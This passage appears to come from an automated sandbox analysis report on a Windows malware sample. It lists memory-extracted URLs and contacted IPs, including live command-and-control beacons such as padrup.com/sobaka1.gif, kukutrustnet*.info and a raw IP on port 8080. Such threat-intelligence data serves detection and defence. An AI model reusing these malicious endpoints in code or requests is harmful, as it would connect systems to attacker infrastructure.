                                                                                                                    https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsijvauyc32.exe, 00000012.00000003.2505307561.0000000003DE5000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3084745108.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1799164284.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                      		unknown
                                                                                                                      https://www.msn.com/de-ch/play/games/master-checkers-multiplayer/cg-9p3c5sx31v9k&quot;SearchApp.exe, 0000001E.00000000.2059415264.000001D61A600000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                        		unknown
                                                                                                                        https://www.msn.com/de-ch/play/games/fairyland%3a-merge-%26-magic/cg-9nw8m0c50k4wSearchApp.exe, 0000001E.00000000.2059415264.000001D61A600000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                          		unknown
                                                                                                                          http://kukutrustnet987.info/home.gifSecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpfalse
                                                                                                                            		unknown
                                                                                                                            http://padrup.com/sobaka1.gif?28892810=465574000Ljvauyc32.exe, 0000000A.00000003.3254569338.000000000142C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		unknown
                                                                                                                              https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 00000017.00000000.1799164284.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              		unknown
                                                                                                                              https://ntp.msn.com/web-widget?form=MSearchApp.exe, 0000001E.00000000.2196009947.000001D62DC41000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                		unknown
                                                                                                                                https://android.notify.windows.com/iOSJMexplorer.exe, 00000017.00000000.1833219394.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2136150315.000000000BE31000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                  		unknown
                                                                                                                                  http://padrup.com/sobaka1.gif?11fef99e=-1275740116#jvauyc32.exe, 0000000A.00000003.2407819962.0000000001446000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    		unknown
                                                                                                                                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPi8-darkjvauyc32.exe, 00000012.00000003.2505307561.0000000003DE5000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3084745108.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1799164284.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                      		unknown
                                                                                                                                      https://substrate.office.comRemovingScopeNarratorText2SearchApp.exe, 0000001E.00000000.2310174583.000001D62E0C6000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                        		unknown
                                                                                                                                        http://padrup.com/sobaka1.gif?2a61d79=222204765Mjvauyc32.exe, 0000000A.00000003.2524944921.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2407819962.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000002.4063142769.000000000143C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2086807690.000000000143C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.3254569338.000000000143C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2043123280.000000000143C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2009490304.000000000143C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2331666794.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2938885386.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2769552015.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2460098695.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2847114789.0000000001446000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          		unknown
                                                                                                                                          https://android.notify.windows.com/iOSZMexplorer.exe, 00000017.00000000.1833219394.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2136150315.000000000BE31000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                            		unknown
                                                                                                                                            https://www.msn.com/de-ch/play/games/fairyland%3a-merge-%26-magic/cg-9nw8m0c50k4w&quot;SearchApp.exe, 0000001E.00000000.2059415264.000001D61A600000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                              		unknown
                                                                                                                                              https://www.yelp.comjvauyc32.exe, 00000012.00000003.2505307561.0000000003DE5000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3084745108.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1799164284.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                		unknown
                                                                                                                                                https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-thejvauyc32.exe, 00000012.00000003.2505307561.0000000003DE5000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3084745108.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1799164284.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                  		unknown
                                                                                                                                                  http://padrup.com/sobaka1.gif?28892810=465574000el#jvauyc32.exe, 0000000A.00000003.3254569338.000000000142C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    		unknown
                                                                                                                                                    http://padrup.com/sobaka1.gif?33c00681=914368262cjvauyc32.exe, 0000000A.00000002.4063142769.000000000143C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      		unknown
                                                                                                                                                      https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svgexplorer.exe, 00000017.00000000.1799164284.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                        		unknown
                                                                                                                                                        https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-jvauyc32.exe, 00000012.00000003.2505307561.0000000003DE5000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3084745108.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1799164284.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                          		unknown
                                                                                                                                                          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPfv-darkjvauyc32.exe, 00000012.00000003.2505307561.0000000003DE5000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3084745108.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1799164284.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                            		unknown
                                                                                                                                                            https://xsts.auth.xboxlive.com/svchost.exe, 00000014.00000002.4042487399.000001697A6A9000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000000.1740927519.000001697A6A9000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                              		unknown
                                                                                                                                                              http://padrup.com/sobaka1.gif?7caa7d=57190763Fjvauyc32.exe, 0000000A.00000003.2086807690.00000000013B9000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2043123280.00000000013B8000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2009490304.00000000013B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                		unknown
                                                                                                                                                                https://www.msn.com/en-us/lifestyle/lifestyle-buzz/what-to-do-if-a-worst-case-nuclear-scenario-actuajvauyc32.exe, 00000012.00000003.2505307561.0000000003DE5000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3084745108.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1799164284.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                  		unknown
                                                                                                                                                                  http://padrup.com/sobaka1.gif?df9780=58613248eSecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1697379207.0000000000962000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    		unknown
                                                                                                                                                                    https://windows.msn.com/shellSearchApp.exe, 0000001E.00000000.1983471827.000001CE12200000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                      		unknown
                                                                                                                                                                      https://www.msn.com/en-us/news/world/a-second-war-could-easily-erupt-in-europe-while-everyone-s-distjvauyc32.exe, 00000012.00000003.2505307561.0000000003DE5000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3084745108.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1799164284.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                        		unknown
                                                                                                                                                                        https://excel.office.compStartMenuExperienceHost.exe, 0000001C.00000000.1921378411.00000273D826E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                          		unknown
                                                                                                                                                                          https://xsts.auth.xboxlive.comsvchost.exe, 00000014.00000002.4042487399.000001697A6A9000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000000.1740927519.000001697A6A9000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000001E.00000000.2059510664.000001D61A642000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                            		unknown
                                                                                                                                                                            http://padrup.com/sobaka1.gif?20c2a09=309164625Xjvauyc32.exe, 0000000A.00000003.2524944921.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2407819962.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000002.4063142769.000000000143C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2086807690.000000000143C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.3254569338.000000000143C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2043123280.000000000143C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2009490304.000000000143C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2331666794.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2938885386.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2769552015.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2460098695.0000000001446000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2847114789.0000000001446000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              		unknown
                                                                                                                                                                              https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/jvauyc32.exe, 00000012.00000003.2505307561.0000000003DE5000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3084745108.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1799164284.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                		unknown
                                                                                                                                                                                http://padrup.com/sobaka1.gif?7caa7d=57190763Wjvauyc32.exe, 0000000A.00000003.2086807690.00000000013B9000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2043123280.00000000013B8000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2009490304.00000000013B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		unknown
                                                                                                                                                                                  http://190.120.227.91:8080/sobakavolos.gif?270a0145=-2040263502_jvauyc32.exe, 0000000A.00000003.3254569338.000000000143C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		unknown
                                                                                                                                                                                    http://schemas.microexplorer.exe, 00000017.00000002.4061338441.0000000002C60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000017.00000000.1800500684.0000000007670000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000017.00000000.1805436497.00000000082D0000.00000002.00000001.00040000.00000000.sdmp, RuntimeBroker.exe, 0000001D.00000000.1970603063.0000023D73980000.00000002.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                                    		unknown
                                                                                                                                                                                    https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svgjvauyc32.exe, 00000012.00000003.2505307561.0000000003DE5000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3084745108.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1799164284.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		unknown
                                                                                                                                                                                      http://kukutrustnet777888.info/DisableTaskMgrSoftwareSecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		unknown
                                                                                                                                                                                        https://www.msn.com/sports?OCID=WSB_TL_EL&PC=wsbmsnqsSearchApp.exe, 0000001E.00000000.2196185871.000001D62DC47000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		unknown
                                                                                                                                                                                          http://padrup.com/sobaka1.gif?29d43e7c=701775484wjvauyc32.exe, 0000000A.00000003.3501517334.00000000013B9000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000002.4063142769.00000000013AF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		unknown
                                                                                                                                                                                            http://padrup.com/sobaka1.gif?df9780=58613248PSecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1697379207.0000000000962000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		unknown
                                                                                                                                                                                              http://padrup.com/sobaka1.gif?269bb762=2392073424jvauyc32.exe, 0000000A.00000003.3254569338.000000000142C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000002.4063142769.000000000142C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		unknown
                                                                                                                                                                                                https://www.msn.com/weather?OCID=WSB_QS_WE&PC=wsbmsnqsSearchApp.exe, 0000001E.00000000.2196185871.000001D62DC47000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                  https://www.msn.com/en-us/news/politics/here-s-what-house-rules-say-about-trump-serving-as-speaker-ojvauyc32.exe, 00000012.00000003.2505307561.0000000003DE5000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3084745108.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1799164284.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                    http://padrup.com/sobaka1.gif?28892810=465574000hjvauyc32.exe, 0000000A.00000003.3254569338.000000000142C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      http://padrup.com/sobaka1.gif?28892810=465574000ejvauyc32.exe, 0000000A.00000003.3254569338.000000000142C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		unknown
                                                                                                                                                                                                        https://www.msn.com/en-us/weather/topstories/stop-planting-new-forests-scientists-say/ar-AA1hFI09jvauyc32.exe, 00000012.00000003.2505307561.0000000003DE5000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3084745108.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1799164284.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          https://loki.delve.office.com/apiSearchApp.exe, 0000001E.00000000.2043154150.000001D61A247000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            https://reactjs.org/docs/error-decoder.html?invariant=SearchApp.exe, 0000001E.00000000.2105582330.000001D61CC23000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPfvjvauyc32.exe, 00000012.00000003.2505307561.0000000003DE5000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3084745108.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1799164284.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              		unknown
                                                                                                                                                                                                              https://aefd.nelreports.net/api/report?cat=wsbSearchApp.exe, 0000001E.00000000.2000494937.000001CE189A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                		unknown
                                                                                                                                                                                                                http://kukutrustnet888.info/home.gifSecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                                  http://padrup.com/sobaka1.gif?16b31880=-8674435840#Kjvauyc32.exe, 0000000A.00000003.3254569338.000000000142C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000002.4063142769.000000000142C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                                    http://kukutrustnet777.info/home.gifSecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                                      https://www.msn.com/en-us/news/world/england-considers-raising-smoking-age-until-cigarettes-are-bannjvauyc32.exe, 00000012.00000003.2505307561.0000000003DE5000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3084745108.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1799164284.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        		unknown
                                                                                                                                                                                                                        https://login.windows.local/svchost.exe, 00000014.00000000.1740856753.000001697A665000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.4039173983.000001697A665000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                                          http://padrup.com/sobaka1.gif?2924596e=690248046Bjvauyc32.exe, 0000000A.00000002.4063142769.000000000142C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                                            http://190.120.227.91:8080/sobakavolos.gifSecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1714018983.00000000042DA000.00000004.00000010.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1697379207.00000000008BE000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1711811568.00000000010BE000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000003.1559539184.000000000089B000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000002.4013785949.0000000000953000.00000004.10000000.00040000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.1719947674.00000000013B0000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2043123280.00000000013B8000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2009490304.00000000013B8000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000002.4054635692.0000000000F7E000.00000040.00000001.01000000.00000009.sdmp, jvauyc32.exe, 00000018.00000002.2148956614.0000000000923000.00000004.10000000.00040000.00000000.sdmp, jvauyc32.exe, 00000018.00000002.2159163080.0000000000F7E000.00000040.00000001.01000000.00000009.sdmpfalse
                                                                                                                                                                                                                              		unknown
                                                                                                                                                                                                                              https://www.msn.com/en-us/news/us/biden-administration-waives-26-federal-laws-to-allow-border-wall-cjvauyc32.exe, 00000012.00000003.2505307561.0000000003DE5000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3084745108.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1799164284.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                		unknown
                                                                                                                                                                                                                                http://89.119.67.154/testo5/http://kukutrustnet777.info/home.gifhttp://kukutrustnet888.info/home.gifSecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  		unknown

                                                                                                                                                                                                                                  World Map of Contacted IPs

                                                                                                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                  • 75% < No. of IPs

                                                                                                                                                                                                                                  Public IPs

                                                                                                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                  113.21.72.31
                                                                                                                                                                                                                                  		unknownIndia
                                                                                                                                                                                                                                  		45775WISHNET-AS-APWISHNETPRIVATELIMITEDINfalse
                                                                                                                                                                                                                                  58.72.195.130
                                                                                                                                                                                                                                  		unknownKorea Republic of
                                                                                                                                                                                                                                  		3786LGDACOMLGDACOMCorporationKRfalse
                                                                                                                                                                                                                                  195.144.14.69
                                                                                                                                                                                                                                  		unknownUkraine
                                                                                                                                                                                                                                  		49389STEALTH-ASUAfalse
                                                                                                                                                                                                                                  58.147.170.86
                                                                                                                                                                                                                                  		unknownBangladesh
                                                                                                                                                                                                                                  		38071AFTABIT-BD-AS-APAftabITLimitedBDfalse
                                                                                                                                                                                                                                  189.56.86.165
                                                                                                                                                                                                                                  		unknownBrazil
                                                                                                                                                                                                                                  		10429TELEFONICABRASILSABRfalse
                                                                                                                                                                                                                                  183.82.176.250
                                                                                                                                                                                                                                  		unknownIndia
                                                                                                                                                                                                                                  		131269BEAMTELE-AS-APACTFIBERNETPvtLtdINfalse
                                                                                                                                                                                                                                  115.119.58.98
                                                                                                                                                                                                                                  		unknownIndia
                                                                                                                                                                                                                                  		4755TATACOMM-ASTATACommunicationsformerlyVSNLisLeadingISPfalse
                                                                                                                                                                                                                                  94.55.239.88
                                                                                                                                                                                                                                  		unknownTurkey
                                                                                                                                                                                                                                  		47524TURKSAT-ASTRfalse
                                                                                                                                                                                                                                  178.22.169.142
                                                                                                                                                                                                                                  		unknownKazakhstan
                                                                                                                                                                                                                                  		41798TTC-ASJSCTranstelecomKZfalse
                                                                                                                                                                                                                                  212.150.50.138
                                                                                                                                                                                                                                  		unknownIsrael
                                                                                                                                                                                                                                  		1680NV-ASNCELLCOMltdILfalse
                                                                                                                                                                                                                                  187.13.131.28
                                                                                                                                                                                                                                  		unknownBrazil
                                                                                                                                                                                                                                  		7738TelemarNorteLesteSABRfalse
                                                                                                                                                                                                                                  95.64.85.169
                                                                                                                                                                                                                                  		unknownIran (ISLAMIC Republic Of)
                                                                                                                                                                                                                                  		197207MCCI-ASIRfalse
                                                                                                                                                                                                                                  201.58.235.159
                                                                                                                                                                                                                                  		unknownBrazil
                                                                                                                                                                                                                                  		7738TelemarNorteLesteSABRfalse
                                                                                                                                                                                                                                  195.174.138.61
                                                                                                                                                                                                                                  		unknownTurkey
                                                                                                                                                                                                                                  		9121TTNETTRfalse
                                                                                                                                                                                                                                  185.53.178.50
                                                                                                                                                                                                                                  		padrup.comGermany
                                                                                                                                                                                                                                  		61969TEAMINTERNET-ASDEtrue
                                                                                                                                                                                                                                  195.174.68.81
                                                                                                                                                                                                                                  		unknownTurkey
                                                                                                                                                                                                                                  		9121TTNETTRfalse
                                                                                                                                                                                                                                  194.5.152.215
                                                                                                                                                                                                                                  		n.ddnsgratis.com.brGermany
                                                                                                                                                                                                                                  		35913DEDIPATH-LLCUStrue
                                                                                                                                                                                                                                  46.248.223.58
                                                                                                                                                                                                                                  		unknownJordan
                                                                                                                                                                                                                                  		9038BAT-AS9038JOfalse
                                                                                                                                                                                                                                  121.162.97.129
                                                                                                                                                                                                                                  		unknownKorea Republic of
                                                                                                                                                                                                                                  		4766KIXS-AS-KRKoreaTelecomKRfalse
                                                                                                                                                                                                                                  41.251.18.107
                                                                                                                                                                                                                                  		unknownMorocco
                                                                                                                                                                                                                                  		36903MT-MPLSMAfalse
                                                                                                                                                                                                                                  183.83.119.156
                                                                                                                                                                                                                                  		unknownIndia
                                                                                                                                                                                                                                  		24309CABLELITE-AS-APAtriaConvergenceTechnologiesPvtLtdBrofalse
                                                                                                                                                                                                                                  95.64.101.42
                                                                                                                                                                                                                                  		unknownIran (ISLAMIC Republic Of)
                                                                                                                                                                                                                                  		197207MCCI-ASIRfalse
                                                                                                                                                                                                                                  46.45.148.196
                                                                                                                                                                                                                                  		unknownTurkey
                                                                                                                                                                                                                                  		42926RADORETRfalse
                                                                                                                                                                                                                                  89.34.99.99
                                                                                                                                                                                                                                  		unknownUnited Kingdom
                                                                                                                                                                                                                                  		25369BANDWIDTH-ASGBfalse
                                                                                                                                                                                                                                  93.113.189.169
                                                                                                                                                                                                                                  		unknownUnited Kingdom
                                                                                                                                                                                                                                  		209706NOOPUpstreamAS41108DEfalse
                                                                                                                                                                                                                                  122.169.104.90
                                                                                                                                                                                                                                  		unknownIndia
                                                                                                                                                                                                                                  		24560AIRTELBROADBAND-AS-APBhartiAirtelLtdTelemediaServicesfalse
                                                                                                                                                                                                                                  124.123.92.252
                                                                                                                                                                                                                                  		unknownIndia
                                                                                                                                                                                                                                  		18209BEAMTELE-AS-APAtriaConvergenceTechnologiespvtltdINfalse
                                                                                                                                                                                                                                  94.76.206.19
                                                                                                                                                                                                                                  		unknownUnited Kingdom
                                                                                                                                                                                                                                  		29550SIMPLYTRANSITGBfalse
                                                                                                                                                                                                                                  77.81.228.140
                                                                                                                                                                                                                                  		unknownItaly
                                                                                                                                                                                                                                  		31034ARUBA-ASNITfalse
                                                                                                                                                                                                                                  195.46.33.124
                                                                                                                                                                                                                                  		unknownUkraine
                                                                                                                                                                                                                                  		196953ASMALTAPLUSUAfalse
                                                                                                                                                                                                                                  94.62.138.226
                                                                                                                                                                                                                                  		unknownPortugal
                                                                                                                                                                                                                                  		12353VODAFONE-PTVodafonePortugalPTfalse
                                                                                                                                                                                                                                  89.45.96.223
                                                                                                                                                                                                                                  		unknownRomania
                                                                                                                                                                                                                                  		6910DIALTELECOMROfalse
                                                                                                                                                                                                                                  81.199.91.188
                                                                                                                                                                                                                                  		unknownUnited Kingdom
                                                                                                                                                                                                                                  		12491IPPLANET-ASILfalse
                                                                                                                                                                                                                                  195.239.22.166
                                                                                                                                                                                                                                  		unknownRussian Federation
                                                                                                                                                                                                                                  		3216SOVAM-ASRUfalse
                                                                                                                                                                                                                                  115.98.98.230
                                                                                                                                                                                                                                  		unknownIndia
                                                                                                                                                                                                                                  		17488HATHWAY-NET-APHathwayIPOverCableInternetINfalse
                                                                                                                                                                                                                                  93.81.148.235
                                                                                                                                                                                                                                  		unknownRussian Federation
                                                                                                                                                                                                                                  		8402CORBINA-ASOJSCVimpelcomRUfalse
                                                                                                                                                                                                                                  85.122.42.91
                                                                                                                                                                                                                                  		unknownRomania
                                                                                                                                                                                                                                  		8708RCS-RDS73-75DrStaicoviciROfalse
                                                                                                                                                                                                                                  190.111.22.45
                                                                                                                                                                                                                                  		unknownGuatemala
                                                                                                                                                                                                                                  		26617NavegacomSAGTfalse
                                                                                                                                                                                                                                  203.110.84.90
                                                                                                                                                                                                                                  		unknownIndia
                                                                                                                                                                                                                                  		23872DELDSLCORE-AS-APdelDSLInternetPvtLtdINfalse
                                                                                                                                                                                                                                  80.178.242.19
                                                                                                                                                                                                                                  		unknownIsrael
                                                                                                                                                                                                                                  		9116GOLDENLINES-ASNPartnerCommunicationsMainAutonomousSystefalse
                                                                                                                                                                                                                                  84.22.25.227
                                                                                                                                                                                                                                  		unknownBulgaria
                                                                                                                                                                                                                                  		29667ATLANTISNET-ASBGfalse
                                                                                                                                                                                                                                  188.72.28.186
                                                                                                                                                                                                                                  		unknownIraq
                                                                                                                                                                                                                                  		49571CELLNET-ASIQfalse
                                                                                                                                                                                                                                  196.20.112.81
                                                                                                                                                                                                                                  		unknownAlgeria
                                                                                                                                                                                                                                  		36947ALGTEL-ASDZfalse
                                                                                                                                                                                                                                  151.56.26.254
                                                                                                                                                                                                                                  		unknownItaly
                                                                                                                                                                                                                                  		1267ASN-WINDTREIUNETEUfalse
                                                                                                                                                                                                                                  27.2.3.124
                                                                                                                                                                                                                                  		unknownViet Nam
